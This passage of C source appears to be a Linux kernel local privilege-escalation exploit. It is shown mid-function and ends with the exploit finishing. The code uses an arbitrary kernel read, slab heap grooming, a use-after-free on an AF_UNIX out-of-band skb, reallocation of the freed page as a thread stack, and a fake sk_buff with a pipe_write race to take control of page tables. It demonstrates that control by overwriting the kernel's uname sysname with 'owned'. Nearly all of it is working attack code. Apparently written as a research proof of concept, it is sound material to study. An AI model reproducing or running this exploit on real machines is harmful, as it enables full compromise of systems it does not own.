        unsigned long end_addr = chunk.base_addr + chunk.nr_pages * 0x1000 - chunk.end_offset;
        printf("0x%lx - 0x%lx\n", start_addr, end_addr);

        for (unsigned long addr = start_addr; addr < end_addr - 32; addr += 0x10) {
  again:;
          unsigned long pcpu_addr = addr - per_cpu_offset[0]; // gs-relative address
          unsigned long lcpu_addr = pcpu_addr + per_cpu_offset[sched_getcpu()];
          unsigned long tid1;
          if (sarb_read(&tid1, lcpu_addr + 8, sizeof(tid1)))
            continue;
          // hacky fastpath, based on assumption that getting this high would take
          // hundreds of days (assuming one allocation every 10ns or so),
          // so wraparound probably takes longer than system uptime
          if (tid1 > 0x8000000000000000)
            continue;
          unsigned long freelist = sarb_readl_checked(lcpu_addr);
          // we won't be able to detect fully-drained slabs here, but that should
          // be fine
          if (freelist < 0xff00000000000000)
            continue;
          unsigned long slab;
          if (sarb_read(&slab, lcpu_addr + 0x10, sizeof(slab)))
            continue;
          if (slab >= /*cpu_entry_area start*/0xfffffe0000000000)
            continue;
          unsigned long cpu = tid1 % CONFIG_NR_CPUS;
          if (sarb_readl_checked(lcpu_addr + 8) != tid1)
            goto again;

          if (slab < vmemmap_base)
            continue;

          unsigned long recalc_page = (freelist - page_offset_base) / 0x1000 * 64 + vmemmap_base;
          if (recalc_page - slab >= 8*64) {
            //printf("      0x%lx: 0x%lx vs 0x%lx, recalc 0x%lx\n", lcpu_addr, freelist, slab, recalc_page);
            continue;
          }

          unsigned long cache = sarb_readl_checked(slab + 8);
          if (sarb_readl_checked(lcpu_addr + 8) != tid1)
            goto again;

          //printf("      0x%lx: cache=0x%lx\n", lcpu_addr, cache);
          if (cache == skbuff_cache) {
            printf("        FOUND skbuff_cache\n");
            skbuff_pcpu = pcpu_addr;
          }
          if (cache == kmalloc_192_acc_cache) {
            printf("        FOUND kmalloc_192_acc_cache\n");
            kmalloc_192_acc_pcpu = pcpu_addr;
          }
        }
      }
    }
    if (!skbuff_pcpu) {
      // allocate one skb, and free it again
      int sockfds[2];
      SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfds));
      SYSCHK(send(sockfds[1], "A", 1, MSG_DONTWAIT));
      close(sockfds[0]);
      close(sockfds[1]);
    }
    if (!kmalloc_192_acc_cache) {
      // allocate one pipe_inode_info, and free it again
      int pipefds_tmp[2];
      SYSCHK(pipe(pipefds_tmp));
      close(pipefds_tmp[0]);
      close(pipefds_tmp[1]);
    }
  }

  char dummy_page[0x1000] = {};
  char dummy_2pages[0x2000] = {};
  int pagestashpipes[3][2];
  for (int i=0; i<3; i++) {
    SYSCHK(pipe(pagestashpipes[i]));
    SYSCHK(write(pagestashpipes[i][1], dummy_2pages, sizeof(dummy_2pages)));
    close(pagestashpipes[i][1]);
  }
  int cycle_pipe[2];
  SYSCHK(pipe(cycle_pipe));
  SYSCHK(write(cycle_pipe[1], dummy_page, 0x1000));

  for (int i=0; i<41; i++) {
    int sockfds[2];
    SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfds));
    flush_skb_fds[i] = sockfds[0];
    for (int j = 0; j < 256; j++)
      SYSCHK(send(sockfds[1], "A", 1, MSG_DONTWAIT));
    close(sockfds[1]);
  }

  // Try to allocate an entire slab page, with a poke FD referencing the object
  // at a specific offset.
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, drainsocks_normal.sockfds));
  int uaf_slab_socks[2];
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, uaf_slab_socks));
  // prepare uaf_write_trigger_fds
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, uaf_write_trigger_fds));
  SYSCHK(send(uaf_write_trigger_fds[1], "A", 1, MSG_OOB)); // alloc A
  SYSCHK(recv(uaf_write_trigger_fds[0], &dummy, 1, MSG_OOB));
  SYSCHK(send(uaf_write_trigger_fds[1], "A", 1, MSG_OOB)); // alloc B
  SYSCHK(recv(uaf_write_trigger_fds[0], &dummy, 1, MSG_OOB));
  unsigned long uaf_slab_va = 0;
  while (1) {
continue_slaballoc:;
    int cpu1 = sched_getcpu();
    unsigned long skbuff_lcpu = skbuff_pcpu + per_cpu_offset[cpu1];
    unsigned long tid1 = sarb_readl_checked(skbuff_lcpu + 8);
    unsigned long slab = sarb_readl_checked(skbuff_lcpu + 0x10);
    unsigned long freelist = sarb_readl_checked(skbuff_lcpu + 0);
    if (tid1 != sarb_readl_checked(skbuff_lcpu + 8) || cpu1 != sched_getcpu())
      continue;

    // If we currently have a non-empty active slab, drain it away.
    if (freelist != 0) {
      drain_one(&drainsocks_normal);
      continue;
    }

    // The percpu freelist is empty, the next allocation will switch to a new
    // slab or pull from the slab freelist.
    // Allocate one SKB and immediately put it back.
    SYSCHK(send(uaf_slab_socks[1], "A", 1, MSG_DONTWAIT));
    SYSCHK(recv(uaf_slab_socks[0], &dummy, 1, MSG_DONTWAIT));
    if (cpu1 != sched_getcpu()) continue;
    tid1 = sarb_readl_checked(skbuff_lcpu + 8);
    slab = sarb_readl_checked(skbuff_lcpu + 0x10);
    freelist = sarb_readl_checked(skbuff_lcpu + 0);
    if (tid1 != sarb_readl_checked(skbuff_lcpu + 8) || cpu1 != sched_getcpu())
      continue;

    // Allocate objects into it and see if we get a full slab worth.
    int objs_in_slab = 0, target_objs_in_slab = 0;
    while (objs_in_slab<SKB__objs_per_slab) {
      unsigned long freelist_cur = sarb_readl_checked(skbuff_lcpu + 0);
      if (sarb_readl_checked(skbuff_lcpu + 8) != tid1 + objs_in_slab*CONFIG_NR_CPUS)
        goto move_to_drain;
      bool is_target_obj = ((freelist_cur & (0x1fff)) == TARGET_OBJECT_OFF);

      SYSCHK(send(uaf_slab_socks[is_target_obj?0:1], "A", 1, MSG_DONTWAIT));
      objs_in_slab++;
      if (is_target_obj)
        target_objs_in_slab++;
      if (sarb_readl_checked(skbuff_lcpu + 8) != tid1 + objs_in_slab*CONFIG_NR_CPUS ||
              cpu1 != sched_getcpu() || (objs_in_slab != SKB__objs_per_slab && freelist_cur == 0)) {
move_to_drain:
        for (int i=0; i<objs_in_slab-target_objs_in_slab; i++) {
          SYSCHK(recv(uaf_slab_socks[0], &dummy, 1, MSG_DONTWAIT));
          if (drain_one(&drainsocks_normal))
            errx(1, "ran out of drain");
        }
        for (int i=0; i<target_objs_in_slab; i++) {
          SYSCHK(recv(uaf_slab_socks[1], &dummy, 1, MSG_DONTWAIT));
          if (drain_one(&drainsocks_normal))
            errx(1, "ran out of drain");
        }
        goto continue_slaballoc;
      }
    }
    if (target_objs_in_slab != 1) {
      printf("weird stuff A (target_objs_in_slab=%d)\n", target_objs_in_slab);
      goto move_to_drain;
    }

    // make dangling pointer to target object and put it on the list with the rest
    SYSCHK(recv(uaf_slab_socks[1], &dummy, 1, MSG_DONTWAIT));
    SYSCHK(send(uaf_write_trigger_fds[1], "A", 1, MSG_OOB));
    SYSCHK(recv(uaf_write_trigger_fds[0], &dummy, 1, 0));
    SYSCHK(send(uaf_slab_socks[1], "A", 1, MSG_DONTWAIT));
    if (cpu1 != sched_getcpu())
      errx(1, "migrated at annoying time A, please try again");
    if (sarb_readl_checked(skbuff_lcpu + 8) != tid1 + (SKB__objs_per_slab+4)*CONFIG_NR_CPUS)
      errx(1, "raced with other slab operation at annoying time B, please try again");
    uaf_slab_va = slab;
    break;
  }

  // do one more allocation to deactivate active slab
  if (drain_one(&drainsocks_normal))
    errx(1, "ran out of drain");

  // fill up min_partial slabs
  close(flush_skb_fds[40]);
  // TODO: percpu stack alloc stuff below risks preemption

  unsigned long uaf_slab_linear = page_to_virt(uaf_slab_va);
  printf("slab page in linear mapping: 0x%lx\n", uaf_slab_linear);

  {
    unsigned int page_refcount = sarb_read4_checked(uaf_slab_va + OFFSET__page__refcount);
    union slab_counters counters = { .counters_short = sarb_read4_checked(uaf_slab_va + offsetof(struct slab, counters)) };
    printf("before freeing slab page: slab page refcount is now %u, inuse=%u, objects=%u, frozen=%u\n",
            page_refcount, counters.inuse, counters.objects, counters.frozen);
    if (page_refcount != 1)
      errx(1, "unexpected page refcount");
  }

  // prepare for thread setup
  bogostack_ready_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  bogostack_continue_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  static const unsigned long userstack_size = 1024*1024;
  unsigned char *bogostack_userstack = SYSCHK(mmap(NULL, userstack_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  memset(bogostack_userstack, 'A', userstack_size);
  SYSCHK(mprotect(bogostack_userstack, 0x1000, PROT_NONE));
  bogostack_userstack += userstack_size;

  // drain percpu stacks
  {
    int cur_cpu = sched_getcpu();
    int threads_created = 0;
    while (threads_created < 2) {
      pthread_t thread;
      if (pthread_create(&thread, NULL, dummy_thread_fn, NULL))
        errx(1, "pthread_create");
      threads_created++;
      if (cur_cpu != sched_getcpu()) {
        threads_created = 0;
        cur_cpu = sched_getcpu();
      }
    }
  }

  unsigned long drain_va_size = totalram_plus_swap / 0x1000/*->pages*/ * 0x200000/*->PTs*/;

  // create VMA with 2M alignment
  char *drain_area_orig = SYSCHK(mmap(NULL, drain_va_size+0x1ff000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0));
  char *drain_area_orig_end = drain_area_orig + drain_va_size+0x1ff000;
  char *drain_area = (char*)(((unsigned long)drain_area_orig + 0x1ff000) & ~0x1ff000UL);
  if (drain_area != drain_area_orig)
    SYSCHK(munmap(drain_area_orig, drain_area - drain_area_orig));
  if (drain_area + drain_va_size != drain_area_orig_end)
    SYSCHK(munmap(drain_area + drain_va_size, drain_area_orig_end - (drain_area + drain_va_size)));
  unsigned long drain_area_off = 0;
  for (unsigned long off = 0; off < drain_va_size; off += 0x200000UL*512UL) {
    // prefault upper page tables
    *(volatile char *)(drain_area+off);
  }

  // free the slab page
  close(uaf_slab_socks[0]);
  close(uaf_slab_socks[1]);

  {
    unsigned int page_refcount = sarb_read4_checked(uaf_slab_va + OFFSET__page__refcount);
    union slab_counters counters = { .counters_short = sarb_read4_checked(uaf_slab_va + offsetof(struct slab, counters)) };
    printf("after freeing slab page: slab page refcount is now %u, inuse=%u, objects=%u, frozen=%u\n",
            page_refcount, counters.inuse, counters.objects, counters.frozen);
  }

  // flush it out of the slab node partial list and page allocator partial list
  for (int i=0; i<40; i++)
    close(flush_skb_fds[i]);

  {
    unsigned int page_refcount = sarb_read4_checked(uaf_slab_va + OFFSET__page__refcount);
    union slab_counters counters = { .counters_short = sarb_read4_checked(uaf_slab_va + offsetof(struct slab, counters)) };
    printf("after flushing: slab page refcount is now %u, inuse=%u, objects=%u, frozen=%u\n",
            page_refcount, counters.inuse, counters.objects, counters.frozen);
    assert(page_refcount == 0);
  }

  while (1) {
    unsigned char page_refcount = sarb_read1_checked(uaf_slab_va + OFFSET__page__refcount);
    if (page_refcount != 0)
      errx(1, "something else got the page, please retry");
    // allocate a page
    SYSCHK(write(cycle_pipe[1], dummy_page, 0x1000));
    // did we get the page we were looking for?
    page_refcount = sarb_read1_checked(uaf_slab_va + OFFSET__page__refcount);

    // free it again
    SYSCHK(read(cycle_pipe[0], dummy_2pages, 0x2000));

    // put the pipe's spare page back into a pipe_buffer
    SYSCHK(write(cycle_pipe[1], dummy_page, 0x1000));

    if (page_refcount != 0)
      break;

    // nope, not it
    *(volatile char *)(drain_area + drain_area_off);
    drain_area_off += 0x200000;
  }
  // free three pages
  for (int i=0; i<3; i++)
    SYSCHK(read(pagestashpipes[i][0], dummy_2pages, 0x2000));
  // create thread
  unsigned long cached_stacks[2] = {percpu_readl(SYSMAP__cached_stacks),percpu_readl(SYSMAP__cached_stacks)};
  unsigned char page_refcount_before_clone = sarb_read1_checked(uaf_slab_va + OFFSET__page__refcount);
  {
    static pid_t bogostack_parent_tid, bogostack_child_tid;
    long clone_result;
    asm volatile (
      "mov %[child_tidptr], %%r10\n\t"
      "mov %[tls], %%r8\n\t" //TLS
      "mov $56, %%eax\n\t"
      "syscall\n\t"
      "test %%eax, %%eax\n\t"
      "jnz 1f\n\t"
      "push $0x1234\n\t"
      "jmp bogostack_thread_fn\n\t"
      "1:\n\t"
      : "=a"(clone_result)
      : "D"(CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID),
        "S"(bogostack_userstack),
        "d"(&bogostack_parent_tid),
        [child_tidptr] "r"(&bogostack_child_tid),
        [tls] "r"(*(unsigned long __seg_fs *)0x10UL) // hack, 0x10 is offsetof(tcbhead_t, self)
      : "cc", "r11", "cx",
        "r10", "r8" // args
    );
    printf("clone() returned %ld\n", clone_result);
    if (clone_result <= 0)
      errx(1, "clone fail");
  }
  SYSCHK(read(bogostack_ready_fd, dummy_page, 8));
  unsigned char page_refcount_after_clone = sarb_read1_checked(uaf_slab_va + OFFSET__page__refcount);
  unsigned int page_type_after_clone = sarb_read1_checked(uaf_slab_va + OFFSET__page__page_type + 3);
  printf("hopefully realloc'd as thread stack vmalloc page now? before=%hhu, after=%hhu, after_type=0x%x\n",
      page_refcount_before_clone, page_refcount_after_clone, page_type_after_clone);
  printf("cached stacks were: 0x%lx, 0x%lx\n", cached_stacks[0], cached_stacks[1]);
  printf("thread stack at 0x%lx\n", bogostack_top_of_stack);
  for (unsigned long i=0; i<4; i++) {
    unsigned long stackpage_va = bogostack_top_of_stack - (4-i) * 0x1000;
    unsigned long stackpage_lm = uvirt_to_kvirt(stackpage_va, 0);
    bool hit = (uaf_slab_linear == stackpage_lm);
    printf("thread stack page %lu: 0x%lx -> 0x%lx %s\n", i, stackpage_va, stackpage_lm, hit?"✔":"✘");
    if (i == 3 && !hit)
      errx(1, "realloc as thread stack page failed");
  }
  printf("realloc as thread stack page succeeded! 🎉\n");

  // allocate a pipe with pipe_inode_info in a known location
  unsigned long addr_leak_pipe_kaddr;
  while (1) {
    int cpu1 = sched_getcpu();
    unsigned long cache_lcpu = kmalloc_192_acc_pcpu + per_cpu_offset[cpu1];
    unsigned long tid1 = sarb_readl_checked(cache_lcpu + 8);
    unsigned long freelist = sarb_readl_checked(cache_lcpu + 0);
    if (tid1 != sarb_readl_checked(cache_lcpu + 8) || cpu1 != sched_getcpu())
      continue;
    if (freelist == 0) {
      SYSCHK(pipe(addr_leak_pipe));
      close(addr_leak_pipe[0]);
      close(addr_leak_pipe[1]);
      continue;
    }

    SYSCHK(pipe(addr_leak_pipe));
    if (tid1+CONFIG_NR_CPUS != sarb_readl_checked(cache_lcpu + 8) || cpu1 != sched_getcpu()) {
      close(addr_leak_pipe[0]);
      close(addr_leak_pipe[1]);
      continue;
    }
    addr_leak_pipe_kaddr = freelist;
    break;
  }
  printf("created pipe_inode_info at 0x%lx\n", addr_leak_pipe_kaddr);
  unsigned long pipe_bufs_kaddr = sarb_readl_checked(addr_leak_pipe_kaddr + OFFSET__pipe_inode_info__bufs);
  printf("pipe buffers at 0x%lx\n", pipe_bufs_kaddr);
  unsigned int pipe_size = sarb_read4_checked(addr_leak_pipe_kaddr + OFFSET__pipe_inode_info__ring_size);
  printf("pipe size (in pages): %u\n", pipe_size);

  // try to get a pipe page adjacent to a page table
#define NUM_PT_COLLECT 10000
  static unsigned long page_table_addrs[NUM_PT_COLLECT][2];
  int page_table_idx_write = 0;
  int page_table_idx_saturated = 0;
  unsigned int cur_pipe_idx = 0;
  unsigned long target_page_table_va;
  unsigned long overflowing_page_va;
  printf("searching for adjacent pages: ");
  for (unsigned long iter=0; true; iter++) {
    if (iter%2 == 0) {
      // allocate a page into our pipe
      SYSCHK(write(addr_leak_pipe[1], dummy_2pages, 0x2000));
    }

    // allocate a page table
    void *ptarea = SYSCHK(mmap(NULL, 0x400000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
    ptarea = (void*)(((unsigned long)ptarea + 0x1ff000) & ~0x1ff000UL);
    SYSCHK(mprotect(ptarea, 0x1000, PROT_READ|PROT_WRITE));
    *(volatile char *)ptarea;
    SYSCHK(mprotect(ptarea, 0x1000, PROT_READ));
    page_table_addrs[page_table_idx_write][0] = (unsigned long)ptarea;
    page_table_addrs[page_table_idx_write][1] = uvirt_to_kvirt((unsigned long)ptarea, 1);
    printf("got table 0x%lx\n", page_table_addrs[page_table_idx_write][1]);
    page_table_idx_write = (page_table_idx_write + 1) % NUM_PT_COLLECT;
    if (page_table_idx_saturated < NUM_PT_COLLECT)
      page_table_idx_saturated++;

    if (iter%2 == 0) {
      // see if the pipe page is in front of a page table we know, otherwise discard it
      unsigned long pipe_buf_idx = (cur_pipe_idx+1) % pipe_size;
      unsigned long ppage = sarb_readl_checked(pipe_bufs_kaddr + sizeof(struct pipe_buffer)*pipe_buf_idx + offsetof(struct pipe_buffer, page));
      unsigned long ppage_virt = page_to_virt(ppage);
      printf("got pipe page 0x%lx (page*=0x%lx)\n", ppage_virt, ppage);

      for (int pti = 0; pti < page_table_idx_saturated; pti++) {
        if (page_table_addrs[pti][1] == ppage_virt+0x1000) {
          overflowing_page_va = ppage_virt;
          target_page_table_va = page_table_addrs[pti][0];
          printf(" HIT! page table region: 0x%lx\n", target_page_table_va);
          goto pt_collect_end;
        }
      }

      SYSCHK(read(addr_leak_pipe[0], dummy_2pages, 0x2000));
      cur_pipe_idx += 2;
      printf(".");
    }
  }
pt_collect_end:;

  // current pipe state: [<old tmp_page>, <overflow page>]
  // first turn it into: [<overflow page, <old tmp_page>]
  SYSCHK(read(addr_leak_pipe[0], dummy_2pages, 0x1000));
  SYSCHK(write(addr_leak_pipe[1], dummy_2pages, 0x1000));
  // then clear the pipe, saving the overflow page as the new tmp_page
  SYSCHK(read(addr_leak_pipe[0], dummy_2pages, 0x2000));

  printf("preparing gigantic virtual address region full of zeropage mappings, this will take a few seconds... ");
  mprotect_region_size = 64UL * 1024 * 1024 * 1024; // 64GiB virtual size, 128MiB of last-level page table memory
  mprotect_region = SYSCHK(mmap(NULL, mprotect_region_size+0x1ff000, PROT_READ|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_NORESERVE, -1, 0));
  // align to page table boundary
  mprotect_region = (void*)(((unsigned long)mprotect_region+0x1ff000) & ~0x1ff000UL);
  // make sure the VMA is not merged with adjacent ones
  SYSCHK(madvise(mprotect_region, mprotect_region_size, MADV_RANDOM));
  // fill it with zeropage PTEs (the slow part, may take 10 or 20 seconds)
  for (unsigned long i = 0; i < mprotect_region_size; i += 0x200000) {
    SYSCHK(madvise(mprotect_region+i+0x1000, 0x1000, MADV_NORMAL)); /* split VMA to prevent THP */
    for (unsigned long j = i; j < i + 0x200000; j += 0x1000)
      *(volatile char *)(mprotect_region+j);
    SYSCHK(madvise(mprotect_region+i+0x1000, 0x1000, MADV_RANDOM)); /* merge VMAs back into one */
  }

  // temporarily make the first four pages writable, then merge them back together into the original VMA
  SYSCHK(mprotect(mprotect_region, 0x4000, PROT_READ|PROT_WRITE));
  *(unsigned long *)(mprotect_region + 0x0000) = 0;
  *(unsigned long *)(mprotect_region + 0x1000) = 0;
  // crafted PTE
  *(unsigned long *)(mprotect_region + 0x3000) = 0x7/*present+writable+user*/ | (overflowing_page_va+0x1000 - page_offset_base);
  SYSCHK(mprotect(mprotect_region, 0x4000, PROT_READ|PROT_EXEC));
  printf("done.\n");

  // prepare mprotect thread
  mprotect_launch_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  pthread_t slow_mprotect_thread;
  if (pthread_create(&slow_mprotect_thread, NULL, slow_mprotect_thread_fn, NULL))
    errx(1, "pthread_create");

  // prepare bumper thread before bogothread starts spinning
  bumper_thread_launch_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  pthread_t bumper_thread;
  if (pthread_create(&bumper_thread, NULL, bumper_thread_fn, NULL))
    errx(1, "pthread_create");

  fakeskb_ready_detect_map = SYSCHK(mmap(NULL, 0x3000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0))+0x1000;
  SYSCHK(mprotect(fakeskb_ready_detect_map, 0x1000, PROT_READ));

  char *spinskb_page_u = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  *(volatile char *)spinskb_page_u = 0;
  char *spinskb_page_k = (void*)uvirt_to_kvirt((unsigned long)spinskb_page_u, 0);
  struct skb_shared_info *spin_ssi_u = (void*)spinskb_page_u;
  struct sk_buff *spin_skb_u = (void*)(spinskb_page_u+0x800);
  spin_ssi_u->frag_list = (void*)(spinskb_page_k+0x800);
  spin_skb_u->next = (void*)(spinskb_page_k+0x800);

  // note: bogothread_spray_data is at address 0x...8
  memset(bogothread_spray_data, 'A', sizeof(bogothread_spray_data));
  ((struct sockaddr*)bogothread_spray_data)->sa_family = AF_UNIX;
#define FAKESKB_CONTROL_WINDOW_STARTOFF 0x68
  struct sk_buff *bogothread_stack_fakeskb = (void*)(bogothread_spray_data-FAKESKB_CONTROL_WINDOW_STARTOFF);
  // not setting bogothread_stack_fakeskb->consumed here - it is outside the
  // bounds of bogothread_spray_data and instead comes from the zeroed unused
  // 7th element of the onstack iovec
  bogothread_stack_fakeskb->len = 1234;
  bogothread_stack_fakeskb->data_len = 1234;
  bogothread_stack_fakeskb->unreadable = 0;
  bogothread_stack_fakeskb->end = 0;
  bogothread_stack_fakeskb->head = (void*)spinskb_page_k;

#if 1
  printf("fakeskb:\n");
  hexdump(bogothread_stack_fakeskb, sizeof(*bogothread_stack_fakeskb));
#endif

  printf("getting fakeskb onto target stack: ");
  while (1) {
    SYSCHK(madvise(fakeskb_ready_detect_map, 0x1000, MADV_DONTNEED));

    SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fakeskb_stack_spray_socks));
    while (1) {
      int res = send(fakeskb_stack_spray_socks[1], "A", 1, MSG_DONTWAIT);
      if (res == -1)
        break;
    }

    eventfd_write(bogostack_continue_fd, 1);
    /* spin until the cmsg read has started */
    while (1) {
      unsigned char incore;
      SYSCHK(mincore(fakeskb_ready_detect_map, 0x1000, &incore));
      if (incore)
        break;
      usleep(100);
    }

    bool fakeskb_placed_ok = sarb_memeq_checked(bogothread_spray_data, bogostack_top_of_stack-0x1000+TARGET_OBJECT_OFF+FAKESKB_CONTROL_WINDOW_STARTOFF, sizeof(bogothread_spray_data));
    if (fakeskb_placed_ok) {
      printf(" SUCCESS\n");
      printf("telling bumper to start spinning... ");
      SYSCHK(eventfd_write(bumper_thread_launch_fd, 1));
      usleep(100*1000); // note: tick interval is 4ms
      printf("assuming that's done\n");
    } else {
      printf("?");
    }

#if 0
    printf("\nreadback:\n");
    char fakeskb_readback[0x1000];
    sarb_read_checked(fakeskb_readback, bogostack_top_of_stack-0x1000, sizeof(fakeskb_readback));
    hexdump(fakeskb_readback, sizeof(fakeskb_readback));
    getchar();
#endif
    // unblock
    close(fakeskb_stack_spray_socks[0]);
    SYSCHK(read(bogostack_ready_fd, dummy_page, 8));
    close(fakeskb_stack_spray_socks[1]);

    if (fakeskb_placed_ok)
      break;
  }

  printf("getting victim pipe_write() onto target stack: ");
  char *pipe_dummybuf = alloca(pipe_size*0x1000);
  memset(pipe_dummybuf, 'A', pipe_size*0x1000);
  bogostack_want_clobber_target = true;
  while (1) {
    // make the pipe state:
    // <tmp_page> <dummy pages>... <free slot>
    SYSCHK(write(addr_leak_pipe[1], pipe_dummybuf, 0x1000*(pipe_size-1)));

    eventfd_write(bogostack_continue_fd, 1);

    // wait for bogostack thread to enter pipe_write()
    while (1) {
      struct pollfd pollfd = {
        .fd = addr_leak_pipe[1],
        .events = POLLOUT
      };
      int pollres = SYSCHK(poll(&pollfd, 1, 0));
      if (pollres == 0)
        break;
    }

    // Check if the stack is at the expected offset.
    // The basic idea is that a return address pointing behind the call to
    // syscall_exit_to_user_mode in do_syscall_64 indicates the currently live
    // syscall because such a return address will always be overwritten by a
    // subsequent call to syscall_exit_to_user_mode at the end of the syscall.
    unsigned long search_retaddr = SYSMAP__do_syscall_64__RETADDR_FROM__x64_sys_call + kaslr_offset;
    if (sarb_memeq_checked(&search_retaddr, bogostack_top_of_stack-0x1000+TARGET_OBJECT_OFF+0x1e0, 8)) {
      printf(" HIT!\n");
      break;
    }

    // let pipe_write() continue, and wait for it to finish
    SYSCHK(read(addr_leak_pipe[0], pipe_dummybuf, pipe_size*0x1000));
    SYSCHK(read(bogostack_ready_fd, dummy_page, 8));

    // make the pipe empty again, preserving tmp_page
    SYSCHK(read(addr_leak_pipe[0], pipe_dummybuf, 0x2000));

    printf(".");
  }

  SYSCHK(madvise(mprotect_region+0x2000, 0x1000, MADV_DONTNEED));
  SYSCHK(eventfd_write(mprotect_launch_fd, 1));

  usleep(10*1000);

  // Let pipe_write() begin copying into overflowing_page_va.
  SYSCHK(read(addr_leak_pipe[0], dummy_page, 0x1000));

  // wait for pipe_write() to enter page fault handling
  usleep(50*1000);

  // trigger the increment (make bumper stop spinning)
  *(volatile unsigned long *)&spin_skb_u->next = 0;

  // if the corruption worked, bogothread should return out of pipe_write()
  SYSCHK(read(bogostack_ready_fd, dummy_page, 8));
  printf("bogothread left pipe_write()\n");

  printf("checking page table control...\n");
  tlb_flush();

#if 0
  char pt_readback_kdump[0x1000];
  sarb_read_checked(pt_readback_kdump, overflowing_page_va+0x1000, 0x1000);
  printf("mprotect_region:\n");
  hexdump(mprotect_region, 0x4000);
  printf("page table read from kernel memory:\n");
  hexdump(pt_readback_kdump, 0x1000);
#endif

  unsigned long pt_test_readback = *(volatile unsigned long *)(target_page_table_va+0x100800);
  printf("page table readback for self-referential entry: 0x%lx\n", pt_test_readback);

  /*
   * demonstrate page table control by mapping init_uts_ns into userspace and
   * overwriting the "sysname" field
   */
  unsigned long init_uts_ns_addr = SYSMAP__init_uts_ns + kaslr_offset;
  printf("init_uts_ns_addr=0x%lx\n", init_uts_ns_addr);
  printf("trying to overwrite utsname to demonstrate page table control\n");
  *(volatile unsigned long *)(target_page_table_va+0x100808) = anyvirt_to_phys(init_uts_ns_addr) | 0x7/*present+writable+user*/;
  printf("PTE2: 0x%lx\n", *(volatile unsigned long *)(target_page_table_va+0x100808));
  tlb_flush();
#if 0
  printf("crafted mapping contents:\n");
  hexdump((void*)target_page_table_va+0x101000, 0x1000);
#endif
  printf("PTE2: 0x%lx\n", *(volatile unsigned long *)(target_page_table_va+0x100808));

  char *init_uts_ns_mapping = (void*)(target_page_table_va+0x101000+(init_uts_ns_addr&0xfff));
  printf("old data: '%s'\n", init_uts_ns_mapping);
  strcpy(init_uts_ns_mapping, "owned");

  /* remove the page table entries again */
  *(volatile unsigned long *)(target_page_table_va+0x100808) = 0;
  *(volatile unsigned long *)(target_page_table_va+0x100800) = 0;
  tlb_flush();
  printf("done. try running `uname -a` to confirm that the write worked\n");
  exit(0);
}
